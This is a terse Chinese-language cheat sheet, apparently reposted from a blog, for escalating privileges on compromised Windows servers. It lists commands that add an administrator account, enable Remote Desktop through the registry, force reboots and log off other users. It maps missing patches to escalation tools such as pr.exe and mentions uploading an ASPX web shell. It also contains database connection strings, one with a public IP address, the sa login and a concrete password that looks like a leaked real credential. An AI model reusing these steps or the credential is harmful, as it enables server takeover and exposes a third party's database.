systeminfo
net user name pass /add
net localgroup administrators name /add
shutdown -r -f -t 1
tasklist /svc
taskkill /im 进程名 /f
logoff 用户ID —————"net user"查看后 去别人登录pr.exe "logoff 0"
ver
set
whoami
net stop/start XX服务
/c net localgroup administrators(user)
reg add hklm\system\currentcontrolset\terminal" "server /v fDenyTSConnection /t REG_DWORD /d 0 /f
提权工具与布丁对比-VER007
补丁号:
KB952004 MS09-012 pr.exe
KB956572 MS09-012 巴西烤肉
KB2393802 ms11011
KB2503665 ms11046
KB2592799 ms11080
MySQL 3306 数据库 root
mssql 1433 数据库 sa
<add name="association" connectionString="server=.;uid=sa;pwd=password;database=wwbz" providerName="System.Data.Sqlclient"/>
<add name="CJQConnectionString" connectionString="Data Source=61.237.237.218;Initial Catalog=Commerce;Persist Security Info=True;User ID=sa;Password=gold20081208spider68417827yq" providerName="System.Data.SqlClient"/>
<!–<add name="CJQConnectionString" connectionString="Data Source=.;Initial Catalog=Commerce;Persist Security Info=True;User ID=sa;Password=password " providerName="System.Data.SqlClient"/>–>
上传apsx马 asp=php<aspx<jsp
使用方法:
pr.exe “ 命令 ” cmd DOS命令 “” " "
转载于:https://www.cnblogs.com/alex-13/p/3728628.html